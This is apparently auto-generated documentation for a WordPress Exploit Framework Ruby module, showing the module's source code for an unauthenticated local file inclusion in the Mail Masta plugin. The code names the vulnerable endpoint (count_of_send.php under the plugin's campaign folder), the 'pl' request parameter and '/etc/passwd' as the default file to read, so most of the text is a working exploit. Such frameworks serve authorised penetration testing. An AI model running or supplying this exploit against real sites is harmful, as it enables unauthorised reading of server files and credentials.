class Wpxf::Auxiliary::MailMastaUnauthenticatedLocalFileInclusion
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb, line 6 def initialize super update_info( name: 'Mail Masta Unauthenticated Local File Inclusion', author: [ 'Guillermo Garcia Marcos', # Disclosure 'rastating' # WPXF module ], desc: %( This module exploits a vulnerability which allows you to include any arbitrary file accessible by the user the web server is running as into the executing script. ), references: [ ['WPVDB', '8609'], ['EDB', '40290'], ['URL', 'https://cxsecurity.com/issue/WLB-2016080220'] ], date: 'Aug 23 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb, line 29 def check check_plugin_version_from_readme('mail-masta') end
default_remote_file_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb, line 37 def default_remote_file_path '/etc/passwd' end
download_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb, line 45 def download_request_params { pl: remote_file } end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb, line 41 def downloader_url normalize_uri(full_uri, working_directory, 'count_of_send.php') end
working_directory()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb, line 33 def working_directory 'wp-content/plugins/mail-masta/inc/campaign' end